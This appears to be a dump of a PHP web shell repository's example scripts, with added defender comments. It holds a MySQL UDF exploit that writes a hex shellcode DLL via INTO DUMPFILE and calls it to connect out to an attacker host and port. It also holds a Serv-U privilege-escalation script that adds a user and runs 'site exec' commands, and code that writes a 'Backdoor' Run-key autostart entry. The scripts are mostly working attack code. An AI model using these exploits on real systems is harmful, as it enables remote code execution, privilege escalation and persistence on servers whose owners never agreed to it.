000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000700000001630793021319731E831F2310E3222322F323A3242326F329F32EB32393341334D3369337D3384338F339933D233D833DE33E433EA33F033F633FC330A341234183423343034383446344B345034553460346D3477348C3498349E34C034D2342E354A355735643500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
18 | // Defender note: the statements below chain three SQL features into code execution on the database host: staging bytes in a BLOB, writing them to disk with INTO DUMPFILE, and registering the file as a user-defined function (UDF). $host/$user/$pass, $chost/$cport, $gt_db and $shellcode are assigned above this excerpt.
19 | if (!$link=mysql_connect($host,$user,$pass)) {
20 | die('Could not connect: ' . mysql_error());
21 | }
22 | echo "
Connected successfully as root
";
23 | // Early exit: if calling myconnect() already succeeds (presumably because the function was registered by an earlier run), the script reports success and stops without touching the filesystem.
24 | $query = "select myconnect('$chost','$cport');";
25 | $result = mysql_query($query, $link);
26 | if ($result){
27 | echo '
'.$query.' ----- Success
';
28 | sleep(1);
29 | mysql_close($link);
30 | exit;
31 | }
32 | // Selects the scratch database named by $gt_db, creating it first when the select fails.
33 | echo "
selecting db for DLl ----- ";
34 | $result=mysql_select_db($gt_db);
35 | if (!$result) {
36 | echo 'Failed
';
37 | echo '
greating db for DLl ----- '.(mysql_create_db($gt_db, $link) ? 'Success' : 'Failed').'
';
38 | echo '
selecting db for DLl ----- '.(mysql_select_db($gt_db, $link) ? 'Success' : 'Failed').'
';
39 | } else {
40 | echo 'Success';
41 | }
42 | // Temporary one-column BLOB table used only to stage the $shellcode value before it is written out.
43 | $query="CREATE TABLE blob_tab (blob_col BLOB);";
44 | echo '
'.$query.' ----- '.(mysql_query($query, $link) ? 'Success' : 'Failed');
45 |
46 | echo '
Inserting blob table for Dll ----- '.(mysql_query("INSERT into blob_tab values (CONVERT($shellcode,CHAR));", $link) ? 'Success' : 'Failed').'
';
47 | // Detection/mitigation point: SELECT ... INTO DUMPFILE writes a file as the database service account. It requires the FILE privilege and is confined or blocked by secure_file_priv; application accounts should not hold FILE, and the application should not connect as root.
48 | echo '
Dumping Dll in c:/kaka.dll ----- '.(mysql_query("SELECT blob_col FROM blob_tab INTO DUMPFILE 'c:/kaka.dll';", $link) ? 'Success' : 'Failed').'
';
49 | // The staging table is dropped; the dumped file stays on disk and is a forensic artifact.
50 | echo '
Drop table name ----- '.(mysql_query("drop table blob_tab", $link) ? 'Success' : 'Failed').'
';
51 | // Detection/mitigation point: CREATE FUNCTION ... SONAME registers a native library as a UDF and leaves a row in mysql.func. Current MySQL/MariaDB releases load UDF libraries only from plugin_dir and reject a path in the SONAME, so keep plugin_dir non-writable by the service account and audit mysql.func for unexpected entries.
52 |
53 | $query="create function myconnect returns integer soname 'c:\\kaka.dll';";
54 | echo '
'.$query.' ----- '.(mysql_query($query, $link) ? 'Success' : 'Failed').'
';
55 | // Invokes the registered function with a host and port; judging by the name and arguments it presumably opens an outbound connection from the database server, which egress filtering on the DB host would limit - confirm against the library.
56 | echo "
Start connecting $chost:$cport .....".(mysql_query("select myconnect('$chost','$cport');", $link) ? 'Success' : 'Failed').'
';
57 |
58 | sleep(1);
59 | mysql_close($link);
60 | ?>
--------------------------------------------------------------------------------
/examples/serv-u_exploit_example.php:
--------------------------------------------------------------------------------
1 | Recv: $recvbuf
";
72 | $sendbuf = "USER ".$suuser."\r\n"; // $sock, $suuser and $supass are set above this excerpt; presumably $sock is a connection to the Serv-U administration interface - confirm
73 | fputs($sock, $sendbuf, strlen($sendbuf));
74 | echo "
Send: $sendbuf";
75 | $recvbuf = fgets($sock, 1024);
76 | echo "
Recv: $recvbuf";
77 | $sendbuf = "PASS ".$supass."\r\n";
78 | fputs($sock, $sendbuf, strlen($sendbuf));
79 | echo "
Send: $sendbuf";
80 | $recvbuf = fgets($sock, 1024);
81 | echo "
Recv: $recvbuf";
82 | $sendbuf = "SITE MAINTENANCE\r\n"; // switches the session into Serv-U's administrative mode; detection point: this verb arriving from a web-server process
83 | fputs($sock, $sendbuf, strlen($sendbuf));
84 | echo "
Send: $sendbuf";
85 | $recvbuf = fgets($sock, 1024);
86 | echo "
Recv: $recvbuf";
87 | $sendbuf = $domain; // payload built outside this excerpt; presumably a domain definition - confirm
88 | fputs($sock, $sendbuf, strlen($sendbuf));
89 | echo "
Send: $sendbuf";
90 | $recvbuf = fgets($sock, 1024);
91 | echo "
Recv: $recvbuf";
92 | $sendbuf = $adduser; // payload built outside this excerpt; presumably an account definition - confirm
93 | fputs($sock, $sendbuf, strlen($sendbuf));
94 | echo "
Send: $sendbuf";
95 | $recvbuf = fgets($sock, 1024);
96 | echo "
Recv: $recvbuf";
97 | echo "**********************************************************
";
98 | if($job!='adduser'){ // every job other than 'adduser' goes on to log in and run a command, then removes the domain again
99 | echo "Starting Exploit ...
";
100 | echo "**********************************************************
";
101 | $exp = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10); // second connection, loopback only, to the port in $ftpport
102 | $recvbuf = fgets($exp, 1024);
103 | echo "
Recv: $recvbuf";
104 | $sendbuf = "USER ".$username."\r\n";
105 | fputs($exp, $sendbuf, strlen($sendbuf));
106 | echo "
Send: $sendbuf";
107 | $recvbuf = fgets($exp, 1024);
108 | echo "
Recv: $recvbuf";
109 | $sendbuf = "PASS ".$password."\r\n";
110 | fputs($exp, $sendbuf, strlen($sendbuf));
111 | echo "
Send: $sendbuf";
112 | $recvbuf = fgets($exp, 1024);
113 | echo "
Recv: $recvbuf";
114 | $sendbuf = "site exec ".$sucommand."\r\n"; // runs $sucommand with the FTP service's privileges; detection point: child processes spawned by the FTP service
115 | fputs($exp, $sendbuf, strlen($sendbuf));
116 | echo "
Send: site exec ".$sucommand."";
117 | $recvbuf = fgets($exp, 1024);
118 | echo "
Recv: $recvbuf";
119 | echo "**********************************************************
";
120 | echo "Starting Delete Domain ...
";
121 | echo "**********************************************************
";
122 | $sendbuf = $deldomain; // cleanup payload (built outside this excerpt) sent on the first connection; FTP server logs may still record the short-lived domain
123 | fputs($sock, $sendbuf, strlen($sendbuf));
124 | echo "
Send: $sendbuf";
125 | $recvbuf = fgets($sock, 1024);
126 | echo "
Recv: $recvbuf";
127 | }else{
128 | echo "All done ...
";
129 | echo "**********************************************************
";
130 | }
131 | fclose($sock);
132 | if($job!='adduser') fclose($exp);
133 | // Defender note: the whole exchange depends on a local process being able to authenticate to the FTP server's administration interface. Confirm that its credentials are not vendor defaults, that the server runs a supported release under a low-privileged account, and that loopback connections from the web-server account to FTP ports are logged.
134 | ?>
--------------------------------------------------------------------------------
/examples/windows_registry.php:
--------------------------------------------------------------------------------
1 | RegRead($regkey));
15 |
16 |
17 |
18 |
19 | /*************************************
20 | Deletes one registry value through the WScript.Shell COM automation object (Windows hosts with PHP's COM extension loaded).
21 | Windows registry delete
22 | Defender note: the value sits under HKLM ...\CurrentVersion\Run, a logon autostart location (MITRE ATT&CK T1547.001). A web-server or PHP process instantiating WScript.Shell or touching Run keys is a strong alert candidate; Sysmon registry events (IDs 12-14) record such changes.
23 | *************************************/
24 |
25 | // KEY: full path of the value to remove; "Backdoor" is the sample value name this file uses
26 | $regkey = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
27 |
28 | $shell= new COM('WScript.Shell');
29 | // NOTE(review): 'success' is printed whenever RegDelete() returns a falsy value; a failure presumably surfaces as a COM exception rather than a return value, so this text is not proof the value was removed - confirm
30 | echo 'Delete registry '.(!$shell->RegDelete($regkey) ? 'success' : 'failed');
31 |
32 |
33 |
34 |
35 | /*************************************
36 | Creates or overwrites one string value through the WScript.Shell COM automation object (Windows hosts with PHP's COM extension loaded).
37 | Windows registry write
38 | Defender note: an executable path written under HKLM ...\CurrentVersion\Run is launched by Windows at user logon (MITRE ATT&CK T1547.001). Mitigations: leave PHP's com_dotnet extension unloaded on web-facing hosts, run the web server under an account that cannot write to HKLM, and baseline and monitor the Run keys.
39 | *************************************/
40 |
41 | // KEY: full path of the Run value to write; "Backdoor" is the sample value name this file uses
42 | $regkey = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
43 | // Registry data type passed to RegWrite(): REG_SZ is a plain string
44 | $regtype = 'REG_SZ';
45 |
46 | // VALUE: the path the Run entry will point at (sample path chosen by the author)
47 | $regval = 'c:\windows\backdoor.exe';
48 |
49 | $shell= new COM('WScript.Shell');
50 |
51 | $a = $shell->RegWrite($regkey, $regval, $regtype);
52 | // NOTE(review): 'success' is printed whenever $a is falsy; a failed write presumably surfaces as a COM exception rather than a return value, so this text is not proof the value was written - confirm
53 | echo 'Write registry '.(!$a ? 'success' : 'failed');
54 |
--------------------------------------------------------------------------------
/misc/687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg
--------------------------------------------------------------------------------
/misc/687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg
--------------------------------------------------------------------------------
/misc/687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg
--------------------------------------------------------------------------------
/misc/687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg
--------------------------------------------------------------------------------
/misc/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/diagram.png
--------------------------------------------------------------------------------
/misc/diagram.psd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/misc/diagram.psd
--------------------------------------------------------------------------------